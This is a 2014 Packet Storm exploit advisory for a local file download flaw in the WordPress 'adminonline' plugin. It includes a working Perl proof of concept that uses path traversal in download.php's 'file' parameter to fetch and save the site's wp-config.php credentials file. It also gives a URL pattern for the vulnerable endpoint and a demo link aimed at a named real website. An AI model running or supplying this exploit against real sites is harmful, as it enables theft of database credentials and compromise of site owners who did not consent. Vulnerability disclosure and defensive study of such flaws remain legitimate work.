WordPress AdminOnline Local File Disclosure

2014-06-11T00:00:00
ID PACKETSTORM:127046
Type packetstorm
Reporter Medrik
Modified 2014-06-11T00:00:00

Description

                                        
                                            `  
  
GGGGGGGGGGGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB   
GGG::::::::::::G H:::::::H H:::::::H B::::::::::::::::B   
GG:::::::::::::::G H:::::::H H:::::::H B::::::BBBBBB:::::B   
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::B B:::::B  
G:::::G GGGGGG H:::::H H:::::H B::::B B:::::B  
G:::::G H:::::H H:::::H B::::B B:::::B  
G:::::G H::::::HHHHH::::::H B::::BBBBBB:::::B   
G:::::G GGGGGGGGGG H:::::::::::::::::H B:::::::::::::BB   
G:::::G G::::::::G H:::::::::::::::::H B::::BBBBBB:::::B   
G:::::G GGGGG::::G H::::::HHHHH::::::H B::::B B:::::B  
G:::::G G::::G H:::::H H:::::H B::::B B:::::B  
G:::::G G::::G H:::::H H:::::H B::::B B:::::B  
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::BBBBBB::::::B  
GG:::::::::::::::G H:::::::H H:::::::H B:::::::::::::::::B   
GGG::::::GGG:::G H:::::::H H:::::::H B::::::::::::::::B   
GGGGGG GGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB   
  
Grey Hat Boy  
  
  
[+] Title : Wordpress adminonline Plugin Local File Download  
[+] Discovered By : Medrik  
[+] CMS Home-Page : http://wordpress.org  
[+] Found Date : 2014-06-11  
[+] Tested On : Windows  
  
###################################  
  
With this Vulnerability You Can Download Target Local Files .  
  
This is LFD Vulnerability In :  
  
File : Download.php  
Parameter : File  
  
########[ Simple Perl Poc ]########  
  
use LWP::Simple;  
$target = 'your target here';  
$confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';  
$req = get $target.$confPath;  
if ($req =~ /package WordPress/){  
print "\n Downloading Config ...";  
open (CONFIG , ">wp-config.txt");  
print CONFIG $req;  
print "\n $target Config Downloaded To File : Wp-config.txt !\n";  
}  
  
########[ End Perl Code ]########  
  
Vulnerability (Locate) :  
  
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]  
  
Demo :  
  
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php  
  
  
Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo ,   
Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .  
`